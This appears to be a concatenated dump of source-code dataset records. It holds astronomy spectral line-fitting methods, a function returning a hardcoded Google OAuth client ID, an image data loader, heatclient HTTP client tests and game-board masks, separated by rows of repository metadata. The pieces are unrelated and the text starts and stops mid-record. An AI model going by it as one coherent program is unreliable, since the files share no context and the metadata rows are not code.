continu=out[0][4]
continuErr=out[1][4][4]**0.5
EW=flux/continu
outPut=n.array([a0,a0+2.782374,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
else :
return n.array([a0,a0+2.782374,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
else :
return n.array([a0,a0+2.782374,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
else :
#print "not enough space to fit the line"
return outPutNF,modNF,header
def fit_Line_OIIdoublet_position_C0noise(self,wl,spec1d,err1d,a0=3726.0321,lineName="O2_3728",fitWidth=20,DLC=20,p0_sigma=4.,p0_flux=1e-16,p0_share=0.58,model="gaussian"):
"""
fits the [OII] doublet line profile
:param wl: wavelength (array, Angstrom)
:param spec1d: flux observed in the broad band (array, f lambda)
:param err1d: error on the flux observed in the broad band (array, f lambda)
:param a0: expected position of the peak of the line in the observed frame (redshifted). 2 positions given.
:param lineName: suffix characterizing the line in the headers of the output
:param DLC: wavelength extent to fit the continuum around the line. (def: 230 Angstrom)
:param p0_sigma: prior on the line width in A (def: 15 A)
:param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
:param p0_share: prior on the share between the two [OII] lines. (def: 0.58)
:param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
:param model: line model to be fitted : "gaussian", "lorentz" or "pseudoVoigt"
Returns :
* array 1 with the parameters of the model
* array 2 with the model (wavelength, flux model)
* header corresponding to the array 1
"""
header=" "+lineName+"_a0a "+lineName+"_a0b "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
outPutNF=n.array([a0, a0+2.782374, self.dV,self.dV, self.dV,self.dV, self.dV, self.dV,self.dV, self.dV,self.dV, self.dV,self.dV,self.dV,self.dV])
modNF=n.array([self.dV,self.dV])
domainLine=(wl>a0-fitWidth)&(wl<a0+2.782374+fitWidth/2.)
domainCont=(wl>a0-fitWidth-DLC)&(wl<a0-fitWidth)
if a0<wl.max()-DLC and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
if model=="gaussian":
flMod=lambda aa,sigma,F0,sh,a0,continu :continu+ self.gaussianLineNC(aa,sigma,(1-sh)*F0,a0)+self.gaussianLineNC(aa,sigma,sh*F0,a0+2.782374)
p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu])
index=n.searchsorted(wl,a0+2.782374)
fd_a0_r=spec1d[index]
index=n.searchsorted(wl,a0)
fd_a0_l=spec1d[index]
if fd_a0_r>continu or fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu]),sigma=continu*n.ones_like(err1d[domainLine]),maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4])
var=continu*n.ones_like(err1d[domainLine])
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
share=out[0][2]
shareErr=out[1][2][2]**0.5
a0=out[0][3]
a0_err=out[1][3][3]**0.5
continu=out[0][4]
continuErr=out[1][4][4]**0.5
EW=flux/continu
outPut=n.array([a0,a0+2.782374,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
else :
return n.array([a0,a0+2.782374,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
else :
return n.array([a0,a0+2.782374,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
else :
#print "not enough space to fit the line"
return outPutNF,modNF,header
def fit_recLine(self,wl,spec1d,err1d,a0,lineName="AL",fitWidth=20,DLC=20,p0_sigma=5.,p0_flux=5e-17,continuumSide="left"):
"""
fits a recombination line profile : emission and absorption modeled by Gaussians. Only for high SNR spectra.
:param wl: wavelength (array, Angstrom)
:param spec1d: flux observed in the broad band (array, f lambda)
:param err1d: error on the flux observed in the broad band (array, f lambda)
:param a0: expected position of the peak of the line in the observed frame (redshifted)
:param lineName: suffix characterizing the line in the headers of the output
:param DLC: wavelength extent to fit the continuum around the line. (def: 230 Angstrom)
:param p0_sigma: prior on the line width in A (def: 15 A)
:param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
:param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
Returns :
* array 1 with the parameters of the model
* array 2 with the model (wavelength, flux model)
* header corresponding to the array 1
"""
header=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
headerPV=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr_"+" fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
outPutNF=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
modNF=n.array([self.dV,self.dV])
if continuumSide=="left":
domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
domainCont=(wl>a0-DLC)&(wl<a0-fitWidth)
if a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
# model with absorption
flMod=lambda aa,sigma,F0,sigmaL,F0L,a0L,sigmaR,F0R,a0R : continu + self.gaussianLineNC(aa,sigma,F0,a0) - self.gaussianLineNC(aa,sigmaL,F0L,a0L) - self.gaussianLineNC(aa,sigmaR,F0R,a0R)
p0=n.array([p0_sigma,p0_flux,p0_sigma/2.,p0_flux/5.,a0-5, p0_sigma/2.,p0_flux/5.,a0-5])
interp=interp1d(wl,spec1d)
fd_a0_r=interp(a0+0.2)
fd_a0_l=interp(a0-0.2)
if fd_a0_r>continu and fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0,sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4],out[0][5],out[0][6],out[0][7])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)-8
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
else :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
else :
#print "not enough space to fit the line"
return outPutNF,modNF,header
elif continuumSide=="right" :
domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
domainCont=(wl>a0+fitWidth)&(wl<a0+DLC)
if a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
# model with absorption
flMod=lambda aa,sigma,F0,sigmaL,F0L,a0L,sigmaR,F0R,a0R : continu + self.gaussianLineNC(aa,sigma,F0,a0) - self.gaussianLineNC(aa,sigmaL,F0L,a0L) - self.gaussianLineNC(aa,sigmaR,F0R,a0R)
p0=n.array([p0_sigma,p0_flux,p0_sigma/2.,p0_flux/5.,a0-5, p0_sigma/2.,p0_flux/5.,a0-5])
interp=interp1d(wl,spec1d)
fd_a0_r=interp(a0+0.2)
fd_a0_l=interp(a0-0.2)
if fd_a0_r>continu and fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0,sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4],out[0][5],out[0][6],out[0][7])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)-8
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
else :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
else :
#print "not enough space to fit the line"
return outPutNF,modNF,header
| 52.876333 | 306 | 0.685834 | 8,439 | 49,598 | 3.939448 | 0.03946 | 0.074357 | 0.087532 | 0.105038 | 0.927989 | 0.92068 | 0.917401 | 0.908768 | 0.902361 | 0.899955 | 0 | 0.055642 | 0.143756 | 49,598 | 937 | 307 | 52.932764 | 0.727183 | 0.214424 | 0 | 0.874636 | 0 | 0 | 0.053564 | 0 | 0.001458 | 0 | 0 | 0 | 0 | 1 | 0.017493 | false | 0 | 0.010204 | 0 | 0.132653 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fd9b5651af0708e77d058926863e115361da8ebc | 114 | py | Python | server/constants.py | nicoleachen8/HarvardOpenData.github.io | 7d9514161b42c3aedf3bd5ec1310e5bb7d35301c | [
"MIT"
] | null | null | null | server/constants.py | nicoleachen8/HarvardOpenData.github.io | 7d9514161b42c3aedf3bd5ec1310e5bb7d35301c | [
"MIT"
] | null | null | null | server/constants.py | nicoleachen8/HarvardOpenData.github.io | 7d9514161b42c3aedf3bd5ec1310e5bb7d35301c | [
"MIT"
] | 1 | 2021-03-27T15:15:34.000Z | 2021-03-27T15:15:34.000Z | def get_google_client_id():
return "1062463862338-1sbchodlc6j0r5n87p2i0dakq9gd83rp.apps.googleusercontent.com" | 57 | 86 | 0.859649 | 11 | 114 | 8.636364 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.224299 | 0.061404 | 114 | 2 | 86 | 57 | 0.663551 | 0 | 0 | 0 | 0 | 0 | 0.634783 | 0.634783 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
fda74355479840586aa12423283ccd13b8ca1765 | 6,441 | py | Python | src/multi_digit_dataloader.py | aashishkumar0228/multi-mnist | 51bf05a6033cc9ad55352ee36250c6060e5bbbaf | [
"MIT"
] | null | null | null | src/multi_digit_dataloader.py | aashishkumar0228/multi-mnist | 51bf05a6033cc9ad55352ee36250c6060e5bbbaf | [
"MIT"
] | null | null | null | src/multi_digit_dataloader.py | aashishkumar0228/multi-mnist | 51bf05a6033cc9ad55352ee36250c6060e5bbbaf | [
"MIT"
] | null | null | null | import cv2
import numpy as np
import pandas as pd
import tensorflow as tf
class MultiDigitDataLoader(tf.keras.utils.Sequence):
def __init__(self,
df_path,
image_base_path,
batch_size,
img_height,
img_width,
num_time_steps,
transform,
max_digit_length=8,
shuffle=True):
'''
df_path: path for dataframe which has file_name and labels
image_base_path: folder where images are
batch_size: batch_size while training
img_height: height of image
img_width: width of image
num_time_steps = number of input time steps for lstm layer
'''
self.batch_size = int(batch_size)
self.image_base_path = image_base_path
self.shuffle = shuffle
self.max_digit_length = max_digit_length
self.img_height = img_height
self.img_width = img_width
self.num_time_steps = num_time_steps
self.transform = transform
self.char_to_int_map = {'0':0,'1':1,'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'a':10}
self.df = pd.read_csv(df_path, header = None, dtype={0: str, 1: str})
self.df.columns = ["file_name", "labels"]
self.df['y_true'] = self.df['labels'].apply(self.create_y_true)
self.df['label_length'] = self.df['labels'].apply(self.get_label_length)
## shuffle the df
if self.shuffle:
self.df = self.df.sample(frac=1).reset_index(drop=True)
def create_y_true(self, label):
y_true = np.ones([1,self.max_digit_length]) * (-1)
# num_list = [int(char) for char in label]
num_list = [self.char_to_int_map[char] for char in label]
y_true[0, 0:len(label)] = num_list
return y_true
def get_label_length(self, label):
return len(label)
def on_epoch_end(self):
if self.shuffle:
self.df = self.df.sample(frac=1).reset_index(drop=True)
def __len__(self):
return int(np.ceil(len(self.df) / float(self.batch_size)))
def get_image(self, filename):
img = cv2.imread(filename, 0)
img = self.transform(image=img)["image"]
img = img.reshape((self.img_height, self.img_width, 1))
return img
def __getitem__(self, idx):
idx_start = idx * self.batch_size
idx_end = min((idx + 1) * self.batch_size, len(self.df))
y_train = np.concatenate(self.df['y_true'][idx_start:idx_end].values,axis=0)
x_train = [self.get_image(self.image_base_path + self.df['file_name'][i]) for i in range(idx_start,idx_end)]
x_train = np.array(x_train)
x_train = np.transpose(x_train, axes=[0,2,1,3])
input_length_arr = self.num_time_steps * np.ones(shape=(idx_end - idx_start, 1), dtype="int64")
label_length_arr = self.df['label_length'][idx_start:idx_end].values.reshape(idx_end - idx_start,1)
inputs = {'image': x_train,
'label': y_train,
'input_length': input_length_arr,
'label_length': label_length_arr,
}
return inputs
class MultiDigitDataLoaderActualShape(tf.keras.utils.Sequence):
def __init__(self,
df_path,
image_base_path,
num_time_steps,
transform,
max_digit_length=3,
shuffle=True):
'''
df_path: path for dataframe which has file_name and labels
image_base_path: folder where images are
batch_size: batch_size while training
img_height: height of image
img_width: width of image
num_time_steps = number of input time steps for lstm layer
'''
self.batch_size = 1 # int(batch_size)
self.image_base_path = image_base_path
self.shuffle = shuffle
self.max_digit_length = max_digit_length
self.num_time_steps = num_time_steps
self.transform = transform
self.char_to_int_map = {'0':0,'1':1,'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'a':10}
self.df = pd.read_csv(df_path, header = None, dtype={0: str, 1: str})
self.df.columns = ["file_name", "labels"]
self.df['y_true'] = self.df['labels'].apply(self.create_y_true)
self.df['label_length'] = self.df['labels'].apply(self.get_label_length)
## shuffle the df
if self.shuffle:
self.df = self.df.sample(frac=1).reset_index(drop=True)
def create_y_true(self, label):
y_true = np.ones([1,self.max_digit_length]) * (-1)
# num_list = [int(char) for char in label]
num_list = [self.char_to_int_map[char] for char in label]
y_true[0, 0:len(label)] = num_list
return y_true
def get_label_length(self, label):
return len(label)
def on_epoch_end(self):
if self.shuffle:
self.df = self.df.sample(frac=1).reset_index(drop=True)
def __len__(self):
return int(np.ceil(len(self.df) / float(self.batch_size)))
def get_image(self, filename):
img = cv2.imread(filename, 0)
img = self.transform(image=img)["image"]
img_height = img.shape[0]
img_width = img.shape[1]
img = img.reshape((img_height, img_width, 1))
return img
def __getitem__(self, idx):
idx_start = idx * self.batch_size
idx_end = min((idx + 1) * self.batch_size, len(self.df))
y_train = np.concatenate(self.df['y_true'][idx_start:idx_end].values,axis=0)
x_train = [self.get_image(self.image_base_path + self.df['file_name'][i]) for i in range(idx_start,idx_end)]
x_train = np.array(x_train)
x_train = np.transpose(x_train, axes=[0,2,1,3])
input_length_arr = self.num_time_steps * np.ones(shape=(idx_end - idx_start, 1), dtype="int64")
label_length_arr = self.df['label_length'][idx_start:idx_end].values.reshape(idx_end - idx_start,1)
inputs = {'image': x_train,
'label': y_train,
'input_length': input_length_arr,
'label_length': label_length_arr,
}
return inputs | 37.666667 | 116 | 0.583139 | 911 | 6,441 | 3.854007 | 0.132821 | 0.054685 | 0.037026 | 0.023925 | 0.933068 | 0.923384 | 0.923384 | 0.903446 | 0.903446 | 0.903446 | 0 | 0.020354 | 0.298246 | 6,441 | 171 | 117 | 37.666667 | 0.756416 | 0.097811 | 0 | 0.820513 | 0 | 0 | 0.044726 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.119658 | false | 0 | 0.034188 | 0.034188 | 0.25641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e32ce0effe965979cdf1a80e1ff62d67b7fa7af7 | 10,924 | py | Python | tests/test_common_http.py | CiscoSystems/python-heatclient | 3740ae9fcb1ed4dc39796ceccbf0e7000be71002 | [
"Apache-2.0"
] | null | null | null | tests/test_common_http.py | CiscoSystems/python-heatclient | 3740ae9fcb1ed4dc39796ceccbf0e7000be71002 | [
"Apache-2.0"
] | null | null | null | tests/test_common_http.py | CiscoSystems/python-heatclient | 3740ae9fcb1ed4dc39796ceccbf0e7000be71002 | [
"Apache-2.0"
] | null | null | null | import StringIO
import os
import httplib2
import httplib
import sys
import mox
import unittest
try:
import json
except ImportError:
import simplejson as json
from keystoneclient.v2_0 import client as ksclient
from heatclient import exc
from heatclient.common import http
import fakes
class HttpClientTest(unittest.TestCase):
# Patch os.environ to avoid required auth info.
def setUp(self):
self.m = mox.Mox()
self.m.StubOutClassWithMocks(http.httplib, 'HTTPConnection')
self.m.StubOutClassWithMocks(http.httplib, 'HTTPSConnection')
def tearDown(self):
self.m.UnsetStubs()
self.m.ResetAll()
def test_http_raw_request(self):
# Record a 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/octet-stream',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'application/octet-stream'},
''))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.raw_request('GET', '')
self.assertEqual(resp.status, 200)
self.assertEqual(''.join([x for x in body]), '')
self.m.VerifyAll()
def test_http_json_request(self):
# Record a 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'application/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.json_request('GET', '')
self.assertEqual(resp.status, 200)
self.assertEqual(body, {})
self.m.VerifyAll()
def test_http_json_request_w_req_body(self):
# Record a 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/', body='"test-body"',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'application/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.json_request('GET', '', body='test-body')
self.assertEqual(resp.status, 200)
self.assertEqual(body, {})
self.m.VerifyAll()
def test_http_json_request_non_json_resp_cont_type(self):
# Record a 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/', body='"test-body"',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'not/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.json_request('GET', '', body='test-body')
self.assertEqual(resp.status, 200)
self.assertEqual(body, None)
self.m.VerifyAll()
def test_http_json_request_invalid_json(self):
# Record a 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'application/json'},
'invalid-json'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.json_request('GET', '')
self.assertEqual(resp.status, 200)
self.assertEqual(body, 'invalid-json')
self.m.VerifyAll()
def test_http_json_request_redirect(self):
# Record the 302
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(302, 'Found',
{'location': 'http://example.com:8004'
}, ''))
# Record the following 200
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
{'content-type': 'application/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
resp, body = client.json_request('GET', '')
self.assertEqual(resp.status, 200)
self.assertEqual(body, {})
self.m.VerifyAll()
def test_http_json_request_prohibited_redirect(self):
# Record the 302
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(302, 'Found',
{'location': 'http://prohibited.example.com:8004'
}, ''))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
self.assertRaises(exc.InvalidEndpoint, client.json_request, 'GET', '')
self.m.VerifyAll()
def test_http_404_json_request(self):
# Record a 404
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(404, 'OK',
{'content-type': 'application/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
self.assertRaises(exc.HTTPNotFound, client.json_request, 'GET', '')
self.m.VerifyAll()
def test_http_300_json_request(self):
# Record a 300
mock_conn = http.httplib.HTTPConnection('example.com', 8004,
'', timeout=600.0)
mock_conn.request('GET', '/',
headers={'Content-Type': 'application/json',
'Accept': 'application/json',
'User-Agent': 'python-heatclient'})
mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(300, 'OK',
{'content-type': 'application/json'},
'{}'))
# Replay, create client, assert
self.m.ReplayAll()
client = http.HTTPClient('http://example.com:8004')
self.assertRaises(exc.HTTPMultipleChoices, client.json_request, 'GET', '')
self.m.VerifyAll()
#def test_https_json_request(self):
# # Record a 200
# mock_conn = http.httplib.HTTPSConnection('example.com', 8004,
# '', timeout=600.0)
# mock_conn.request('GET', '/',
# headers={'Content-Type': 'application/json',
# 'Accept': 'application/json',
# 'User-Agent': 'python-heatclient'})
# mock_conn.getresponse().AndReturn(fakes.FakeHTTPResponse(200, 'OK',
# {'content-type': 'application/json'},
# '{}'))
# # Replay, create client, assert
# self.m.ReplayAll()
# client = http.HTTPClient('https://example.com:8004', ca_file='dummy',
# cert_file='dummy',
# key_file='dummy')
# resp, body = client.json_request('GET', '')
# self.assertEqual(resp.status, 200)
# self.assertEqual(body, {})
# self.m.VerifyAll()
def test_fake_json_request(self):
self.assertRaises(exc.InvalidEndpoint, http.HTTPClient, 'fake://example.com:8004')
| 47.495652 | 90 | 0.496064 | 961 | 10,924 | 5.540062 | 0.118626 | 0.049587 | 0.06311 | 0.08302 | 0.851991 | 0.825695 | 0.825695 | 0.825695 | 0.812171 | 0.789068 | 0 | 0.034553 | 0.374771 | 10,924 | 229 | 91 | 47.703057 | 0.744949 | 0.134291 | 0 | 0.707602 | 0 | 0 | 0.169022 | 0.007543 | 0 | 0 | 0 | 0 | 0.093567 | 1 | 0.070175 | false | 0 | 0.081871 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e33c8e65e63343f2d0b7a5e444dfc282f0597b5a | 1,688 | py | Python | python/lib/masks.py | omardelarosa/godot-python-demo-game | c9c91b2a8e838c315dae6d6d597ce75a20318747 | [
"CC-BY-3.0"
] | null | null | null | python/lib/masks.py | omardelarosa/godot-python-demo-game | c9c91b2a8e838c315dae6d6d597ce75a20318747 | [
"CC-BY-3.0"
] | null | null | null | python/lib/masks.py | omardelarosa/godot-python-demo-game | c9c91b2a8e838c315dae6d6d597ce75a20318747 | [
"CC-BY-3.0"
] | null | null | null | from python.lib.board_state import BoardState
CROSS_MASK = {
"mask": [
[None, BoardState.FILLED_TILE, None],
[
BoardState.FILLED_TILE,
BoardState.MASK_DEFAULT_PIVOT_VALUE,
BoardState.FILLED_TILE,
],
[None, BoardState.FILLED_TILE, None],
[None, BoardState.FILLED_TILE, None],
],
"shape": (3, 4),
}
SWORD_MASK = {
"mask": [
[None, BoardState.FILLED_TILE, None],
[
BoardState.FILLED_TILE,
BoardState.MASK_DEFAULT_PIVOT_VALUE,
BoardState.FILLED_TILE,
],
[None, BoardState.FILLED_TILE, None],
],
"shape": (3, 3),
}
SPEAR_MASK = {
"mask": [
[None, None, BoardState.FILLED_TILE, None, None],
[None, None, BoardState.FILLED_TILE, None, None],
[
BoardState.FILLED_TILE,
BoardState.FILLED_TILE,
BoardState.MASK_DEFAULT_PIVOT_VALUE,
BoardState.FILLED_TILE,
BoardState.FILLED_TILE,
],
[None, None, BoardState.FILLED_TILE, None, None],
[None, None, BoardState.FILLED_TILE, None, None],
],
"shape": (5, 5),
}
X_MASK = {
"mask": [
[BoardState.FILLED_TILE, None, None, None, BoardState.FILLED_TILE],
[None, BoardState.FILLED_TILE, None, BoardState.FILLED_TILE, None],
[
None,
None,
BoardState.MASK_DEFAULT_PIVOT_VALUE,
None,
None,
],
[None, BoardState.FILLED_TILE, None, BoardState.FILLED_TILE, None],
[BoardState.FILLED_TILE, None, None, None, BoardState.FILLED_TILE],
],
"shape": (5, 5),
} | 26.793651 | 75 | 0.562204 | 168 | 1,688 | 5.39881 | 0.130952 | 0.441014 | 0.551268 | 0.502756 | 0.904079 | 0.880926 | 0.880926 | 0.867696 | 0.867696 | 0.759647 | 0 | 0.006938 | 0.316943 | 1,688 | 63 | 76 | 26.793651 | 0.779705 | 0 | 0 | 0.741379 | 0 | 0 | 0.021314 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017241 | 0 | 0.017241 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
e359f989c26c7e9114b49542806b2253615ef0a1 | 196 | py | Python | {{cookiecutter.project_slug}}/python/tests/test_python_bindings.py | Wellidontcare/cookiecutter-cpp-project | 09988b1933b7695dfaac48b68b4060655b1b233a | [
"MIT"
